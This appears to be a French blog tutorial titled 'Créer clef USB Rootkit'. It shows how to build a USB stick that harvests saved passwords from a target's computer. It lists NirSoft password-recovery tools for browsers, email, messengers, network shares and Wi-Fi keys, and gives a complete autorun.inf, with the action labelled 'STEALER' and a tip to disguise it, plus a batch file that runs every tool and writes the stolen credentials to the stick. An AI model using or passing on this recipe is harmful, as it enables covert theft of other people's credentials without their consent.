Créer clef USB Rootkit :
Apres la demande de certains membres de ce blog, Sebdelkil vous reposent le tuto pour la ceration de cette clef Rootkit, vous n'aurez cas la connecter a l'ordie dont vous voulez récupérer les mots de passe et le tour est jouer...
Dans un premier temps, nous allons récupérer plusieurs logiciels qui nous
permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).
> ChromePass : ChromePass est un outil qui vous
permet de retrouver les noms d’utilisateur et mots de passe stockés par le navigateur Web Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le
nom d’utilisateur, mot de passe et l’heure de création.
Lien de téléchargement :
http://www.nirsoft.net/utils/chromepass.html
> IE PassView: IE PassView est un petit
utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Compatible avec le nouveau Internet Explorer 8.0, ainsi que les anciennes versions d’Internet Explorer v4.0
v6.0 v7.0.
Lien de téléchargement :
http://www.nirsoft.net/utils/internet_explorer_password.html
> Mail PassView: récupère les mots de passe des programmes de
messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP et SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free, hotmail, yahoo, msn, gmail.
Lien de téléchargement :
http://www.nirsoft.net/utils/mailpv.html
> MessenPass: récupère les mots de passe de messagerie
instantanée le plus populaire des programmes: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger avec Netscape ...
Lien de téléchargement :
http://www.nirsoft.net/utils/mspass.html
> Network Password Recovery : Lorsque vous vous
connectez à un partage réseau sur votre réseau local ou sur votre compte. NET Passport, Windows vous permet d’enregistrer votre mot de passe afin de l’utiliser à chaque fois que vous vous
connectez sur le serveur distant. Cet utilitaire récupère tous les mots de passe réseau stockés sur votre système pour l’utilisateur connecté.
Lien de téléchargement :
http://www.nirsoft.net/utils/network_password_recovery.html
> PasswordFox: PasswordFox est un petit outil qui vous
permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Mozilla Firefox.
Lien de téléchargement :
http://www.nirsoft.net/utils/passwordfox.html
> Protected Storage PassView: Récupère tous les mots de passe
stockés dans le Protected Storage, y compris la saisie semi-automatique des mots de passe d’Internet Explorer, les mots de passe des sites protégés par mot de passe, mot de passe de MSN Explorer...
Lien de téléchargement :
http://www.nirsoft.net/utils/pspv.html
> WirelessKeyView : WirelessKeyView récupère toutes les
clés des réseaux sans fil / mots de passe (WEP / WPA) stockés dans votre ordinateur .
Lien de téléchargement :
http://www.nirsoft.net/utils/wireless_key.html
Maintenant que nous avons tous les outils nécessaires, nous allons pouvoir commencer à créer
la clef .
1 - Commencez par récupérer tous les .exe que nous venons de télécharger et placez les
à la racine de votre clef usb .
2 - Ouvrez le bloc note et copiez le texte suivant :
[autorun]
open = launch.bat
ACTION = STEALER
Puis enregistrez le fichier sous la racine de la clé sous le nom: autorun.inf
Vous pouvez changer "STEALER" par "X Fichiers" ou par ce que vous vouler.
Rajoutez juste une ligne de commande dans le .bat que nous allons voir après pour ouvrir l'explorer...
3 - Ouvrez le bloc note et copiez le texte suivant :
@echo off
start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start mspass.exe /stext mspass.txt
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start pspv.exe /stext pspv.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
Ensuite enregistrez votre document à la
racine de votre clé, sous le nom de launch.bat
Voila, c'est fini, les mots de passe au format texte serons dans la racine de votre clef usb .